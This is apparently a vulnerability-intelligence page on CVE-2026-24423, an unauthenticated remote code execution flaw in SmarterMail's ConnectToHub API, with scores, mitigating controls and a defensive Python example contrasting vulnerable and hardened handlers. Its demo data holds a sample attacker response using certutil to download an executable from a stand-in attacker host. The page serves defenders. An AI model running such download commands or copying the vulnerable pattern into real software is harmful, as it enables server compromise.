Cyber Posture

CVE-2026-24423

Critical · CISA KEV · Active Exploitation · Public PoC · Ransomware-linked

Published: 23 January 2026
Modified: 06 February 2026
KEV Added: 05 February 2026
Patch: available (build 9511 or later)
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.8065 (99.2nd percentile)
Risk Priority: 88 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2026-24423 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability in SmarterTools SmarterMail. Its CVSS v3.1 base score is 9.8 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 0.8% of all CVEs by EPSS exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog, and a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation), in practice upgrading to build 9511 or later, and SI-10 (Information Input Validation); AC-14 (Permitted Actions without Identification or Authentication) addresses the underlying CWE-306 weakness.

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5) [AI]

SI-2 Flaw Remediation · prevent
Timely flaw remediation through vendor patching to build 9511 or later directly eliminates the unauthenticated RCE vulnerability in ConnectToHub, as recommended in the advisories.

SI-10 Information Input Validation · prevent
Validating what the ConnectToHub method accepts, both the caller-supplied hub address and the HTTP response it receives, prevents the application from treating an untrusted server's response as an OS command to execute.

AC-14 Permitted Actions without Identification or Authentication · prevent
Defining and limiting which actions may be performed without identification or authentication, and excluding ConnectToHub from that set, directly mitigates the CWE-306 missing authentication for this critical function.

MITRE ATT&CK Enterprise Techniques [AI]

T1190 Exploit Public-Facing Application · Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

The vulnerability is an unauthenticated RCE in the ConnectToHub API method of a public-facing webmail application (SmarterMail), so initial access is gained by exploiting the exposed application directly, which is exactly the behaviour T1190 describes.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

NVD Description

SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method. The attacker could point the SmarterMail to the malicious HTTP server, which serves the malicious OS command. This command will be executed by the vulnerable application.

Deeper analysis [AI]

CVE-2026-24423 is an unauthenticated remote code execution vulnerability in SmarterTools SmarterMail versions prior to build 9511. The issue affects the ConnectToHub API method, stemming from CWE-306 (Missing Authentication for Critical Function). It carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating critical severity due to its network accessibility, low complexity, and lack of prerequisites.

An unauthenticated remote attacker exploits the flaw by calling ConnectToHub with the address of an HTTP server they control. That server answers with an OS command, which the vulnerable application executes with the privileges of the SmarterMail process, enabling full server compromise including data exfiltration, modification, or disruption.

Advisories from VulnCheck and Code White detail the flaw, while SmarterTools release notes address it in build 9511 and later, recommending immediate upgrades for mitigation. The vulnerability appears in the CISA Known Exploited Vulnerabilities Catalog, underscoring the need for urgent patching.
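The weakness described in the analysis above and the controls listed under Mitigating Controls (AC-14 for the missing authentication, SI-10 for the untrusted response) can be shown side by side. The following is an added illustration written for this page, not SmarterTools' code and not the actual ConnectToHub implementation: a hypothetical request model, a vulnerable handler that hands the fetched body to the OS, and a hardened handler that requires an authenticated administrator, pins the hub destination to an allowlist, and parses the response as data. The allowlisted host, the `status=...;build=...` response grammar and the sample responses are all constructed assumptions.

```python
# Added illustration (not SmarterTools code): the CWE-306 pattern behind
# CVE-2026-24423 as the page describes it, beside a hardened version.
# All names, hosts and response formats are hypothetical.
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import urlparse
import re

Fetcher = Callable[[str], str]   # injected HTTP fetch, so the demo runs offline


@dataclass
class Request:
    """Stand-in for whatever the real API method receives (hypothetical)."""
    session_user: Optional[str]  # None means the caller is unauthenticated
    is_admin: bool
    hub_url: str                 # caller-supplied hub address


# ---- Vulnerable shape ---------------------------------------------------------
def connect_to_hub_vulnerable(req: Request, fetch: Fetcher) -> str:
    """No authentication check, any URL accepted, and the HTTP response body
    is handed to the OS as a command (here only returned, never executed)."""
    command = fetch(req.hub_url)
    return f"EXECUTED: {command}"   # the real bug would run this via a shell


# ---- Hardened shape -----------------------------------------------------------
ALLOWED_HUB_HOSTS = {"hub.example.internal"}   # assumption: pinned, trusted hub hosts
STATUS_RE = re.compile(r"^status=(ok|degraded);build=(\d{1,6})$")  # assumed grammar


class AccessDenied(Exception):
    pass


class UntrustedHub(Exception):
    pass


class MalformedHubResponse(Exception):
    pass


def connect_to_hub_hardened(req: Request, fetch: Fetcher) -> dict:
    # AC-14 / CWE-306: the critical function now requires an authenticated admin.
    if req.session_user is None or not req.is_admin:
        raise AccessDenied("ConnectToHub requires an authenticated administrator")
    # Destination control: only HTTPS to pre-approved hub hosts, so a caller
    # cannot point the server at a host they control.
    parts = urlparse(req.hub_url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HUB_HOSTS:
        raise UntrustedHub(req.hub_url)
    # SI-10: the response is matched against a strict grammar and used as data.
    return parse_hub_status(fetch(req.hub_url))


def parse_hub_status(body: str) -> dict:
    m = STATUS_RE.match(body.strip())
    if not m:
        raise MalformedHubResponse(body[:80])
    return {"status": m.group(1), "build": int(m.group(2))}


# ---- Constructed demo inputs (not captured traffic) --------------------------
FAKE_RESPONSES = {
    "http://attacker.example/hub": "whoami && certutil -urlcache -f http://attacker.example/p.exe p.exe",
    "https://hub.example.internal/status": "status=ok;build=9511",
}


def fake_fetch(url: str) -> str:
    return FAKE_RESPONSES[url]


def demo() -> dict:
    """Runs the vulnerable path once and the hardened path three times."""
    anon = Request(session_user=None, is_admin=False, hub_url="http://attacker.example/hub")
    admin_bad = Request(session_user="admin", is_admin=True, hub_url="http://attacker.example/hub")
    admin_ok = Request(session_user="admin", is_admin=True, hub_url="https://hub.example.internal/status")

    out = {"vulnerable": connect_to_hub_vulnerable(anon, fake_fetch)}
    for name, req in (("anon", anon), ("admin_bad_host", admin_bad), ("admin_ok", admin_ok)):
        try:
            out[name] = connect_to_hub_hardened(req, fake_fetch)
        except (AccessDenied, UntrustedHub, MalformedHubResponse) as exc:
            out[name] = type(exc).__name__
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>16}: {result}")
```

The three hardened-path outcomes correspond to the three controls: the anonymous call fails on the authentication check (AC-14), the authenticated call to an attacker host fails on the destination allowlist, and only the call to the pinned hub reaches the parser, which would reject a command string as malformed rather than pass it anywhere near a shell (SI-10). Patching to build 9511 (SI-2) remains the actual fix; this only shows the shape of the defect and its remediation.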

Details

CWE(s)
CWE-306 Missing Authentication for Critical Function
KEV Date Added
05 February 2026

Affected Products

smartertools
smartermail
< 100.0.9511 (all builds prior to 9511; fixed in build 9511)

CVEs Like This One

CVE-2026-23760 (same product: SmarterTools SmarterMail; both on KEV)
CVE-2025-52691 (same product: SmarterTools SmarterMail; both on KEV)
CVE-2025-61757 (shared CWE-306; both on KEV)
CVE-2026-41940 (shared CWE-306; both on KEV)
CVE-2026-39987 (shared CWE-306; both on KEV)
CVE-2025-0108 (shared CWE-306; both on KEV)
CVE-2026-26340 (shared CWE-306)
CVE-2025-54816 (shared CWE-306)
CVE-2025-53072 (shared CWE-306)
CVE-2026-4640 (shared CWE-306)
